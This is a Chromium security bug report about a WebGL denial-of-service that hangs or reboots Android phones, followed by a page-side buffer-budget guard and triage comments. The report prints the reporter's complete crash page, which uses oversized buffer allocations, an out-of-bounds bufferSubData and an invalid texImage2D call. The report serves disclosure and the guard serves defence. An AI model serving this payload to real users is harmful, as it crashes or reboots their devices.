Issue 653888

Issue metadata

Status: Duplicate
Owner: ----
Closed: Oct 2016
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security

GPU crash: denial of service or any other impact on the system

Reported by larawe...@gmail.com, Oct 7 2016

Issue description

Denial of service: a malicious user, with the aid of a specially formed web page, can cause the device to hang or reboot.

1. Go to http://unix.testvt.testforhost.com/sec/test_gpu.html

Browser/OS: Google Chrome 53.0.2785.124; Android 4.4.2; ZTE T221 Build/KOT49H

Test 1: browser drop and long freeze
Test 2: browser drop
Test 3: phone reboot
Test 4: phone reboot
Test 5: browser drop, long freeze, launcher reboot

This bug was reported earlier for the desktop version of the Chrome browser. In Chrome for Android the browser behavior has changed: on phones with a weak graphics processor there may be a longer hang or a restart.

Fetched the following from http://unix.testvt.testforhost.com/sec/test_gpu.html (for posterity):

<html>
<body>
<canvas id=c></canvas>
<script>
ctx = c.getContext("webgl");

function crash(){
	vertices = [];
	counter = 0;
	while (counter < 1000) {
		vertices[counter] = 5;
		counter++;
	}

	// 200 buffers, each asking for 233287450 bytes of storage, followed by a
	// bufferSubData write that starts at that same offset, i.e. past the end.
	for (i=0; i< 200; i++){
		buffer = ctx.createBuffer();
		ctx.bindBuffer(ctx.ARRAY_BUFFER, buffer);
		ctx.bufferData(ctx.ARRAY_BUFFER, 233287450,ctx.STATIC_DRAW);
		ctx.bufferSubData(ctx.ARRAY_BUFFER, 233287450, new Float32Array(vertices))
	}
}

// After the context is lost: drop the context, rewrite the document, force GC,
// then navigate away one second later.
c.addEventListener("webglcontextlost", function(){
	c.removeEventListener("webglcontextlost");
	setTimeout(function(){
		ctx = null;
		document.open();
		document.close();
		window.gc();
	},1000);

	setTimeout(function(){
		document.location = "http://www.google.com";
	},2000);
});

// texImage2D with an invalid mipmap level (333) and the canvas itself as source.
ctx.texImage2D(ctx.TEXTURE_2D,333,ctx.RGBA4,ctx.RGBA4,ctx.UNSIGNED_BYTE,c);
crash();
</script>
</body>
</html>
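For contrast with the page above, here is an added example (not the reporter's code and not Chromium's) of how a WebGL application can keep its own buffer allocations inside a budget and handle context loss the way the WebGL specification describes, rather than relying on the driver to survive oversized or out-of-range requests. The per-buffer cap, the page budget, and the fake `WebGLRenderingContext` stand-in are assumptions constructed for this example so that it runs under Node without a GPU; `BudgetedBuffers`, `installContextLossHandlers`, `makeFakeContext` and `replayTestPageLoop` are names introduced here.

```javascript
// Added example for this page (not the reporter's or Chromium's code): a
// page-side allocation guard for WebGL buffers plus spec-conformant context-loss
// handling. Caps and the fake context are constructed assumptions.

const PER_BUFFER_CAP = 64 * 1024 * 1024;   // assumed cap: 64 MiB per buffer
const TOTAL_BUDGET   = 256 * 1024 * 1024;  // assumed cap: 256 MiB for the page

class BudgetedBuffers {
  constructor(gl, perBufferCap = PER_BUFFER_CAP, totalBudget = TOTAL_BUDGET) {
    this.gl = gl;
    this.perBufferCap = perBufferCap;
    this.totalBudget = totalBudget;
    this.allocated = 0;      // bytes currently held across all buffers
    this.sizes = new Map();  // buffer object -> bytes allocated for it
  }

  // bufferData() with a byte count (the form the test page used) or a typed
  // array. Non-integer, negative, oversized or over-budget requests are refused
  // before they reach the driver. Returns the accepted size in bytes.
  bufferData(buffer, target, sizeOrData, usage) {
    const bytes = typeof sizeOrData === 'number' ? sizeOrData : sizeOrData.byteLength;
    if (!Number.isInteger(bytes) || bytes < 0) {
      throw new RangeError(`bufferData: invalid size ${String(sizeOrData)}`);
    }
    if (bytes > this.perBufferCap) {
      throw new RangeError(`bufferData: ${bytes} bytes exceeds per-buffer cap ${this.perBufferCap}`);
    }
    const previous = this.sizes.get(buffer) || 0;  // re-specifying replaces old storage
    if (this.allocated - previous + bytes > this.totalBudget) {
      throw new RangeError(`bufferData: ${bytes} bytes would exceed page budget ${this.totalBudget}`);
    }
    this.gl.bindBuffer(target, buffer);
    this.gl.bufferData(target, sizeOrData, usage);
    this.allocated += bytes - previous;
    this.sizes.set(buffer, bytes);
    return bytes;
  }

  // bufferSubData() must write entirely inside the buffer's current storage.
  // Returns the end offset of the write.
  bufferSubData(buffer, target, offset, data) {
    const size = this.sizes.get(buffer);
    if (size === undefined) throw new Error('bufferSubData: buffer has no storage');
    const end = offset + data.byteLength;
    if (!Number.isInteger(offset) || offset < 0 || end > size) {
      throw new RangeError(`bufferSubData: range [${offset}, ${end}) outside ${size}-byte buffer`);
    }
    this.gl.bindBuffer(target, buffer);
    this.gl.bufferSubData(target, offset, data);
    return end;
  }

  deleteBuffer(buffer) {
    this.allocated -= this.sizes.get(buffer) || 0;
    this.sizes.delete(buffer);
    this.gl.deleteBuffer(buffer);
  }
}

// Context loss per the WebGL spec: preventDefault() on "webglcontextlost" asks
// the browser to fire "webglcontextrestored"; GPU resources are recreated only
// then, and the lost context is not touched in between.
function installContextLossHandlers(canvas, onRestore) {
  canvas.addEventListener('webglcontextlost', (event) => event.preventDefault(), false);
  canvas.addEventListener('webglcontextrestored', () => onRestore(), false);
}

// Constructed stand-in for a WebGLRenderingContext: records calls, allocates nothing.
function makeFakeContext() {
  const calls = [];
  return {
    ARRAY_BUFFER: 0x8892, STATIC_DRAW: 0x88E4, calls,
    createBuffer() { return { id: calls.length }; },
    bindBuffer(target, buffer) { calls.push(['bindBuffer', target, buffer.id]); },
    bufferData(target, sizeOrData, usage) { calls.push(['bufferData', target, usage]); },
    bufferSubData(target, offset, data) { calls.push(['bufferSubData', target, offset]); },
    deleteBuffer(buffer) { calls.push(['deleteBuffer', buffer.id]); },
  };
}

// Replays the test page's loop (200 buffers of 233287450 bytes) through the guard
// and reports how many requests reached the driver and how many were refused.
function replayTestPageLoop(gl, guard) {
  let accepted = 0, refused = 0;
  for (let i = 0; i < 200; i++) {
    try {
      guard.bufferData(gl.createBuffer(), gl.ARRAY_BUFFER, 233287450, gl.STATIC_DRAW);
      accepted++;
    } catch (e) {
      if (!(e instanceof RangeError)) throw e;
      refused++;
    }
  }
  return { accepted, refused, driverCalls: gl.calls.length };
}
```

With the assumed 64 MiB cap, every one of the 200 requests from the test page is refused before `bindBuffer` is ever called, and the out-of-range `bufferSubData` at offset 233287450 is caught against the tracked buffer size. In a real page the same class wraps the actual `WebGLRenderingContext`; the fake context only exists so the logic can be exercised offline.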

Comment 2 by ClusterFuzz (Project Member), Oct 7 2016

ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5625079105060864

Comment 3 by tsepez@chromium.org, Oct 10 2016

Mergedinto: 653372
Status: Duplicate (was: Unconfirmed)

Comment 4 by sheriffbot@chromium.org (Project Member), Jan 17 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot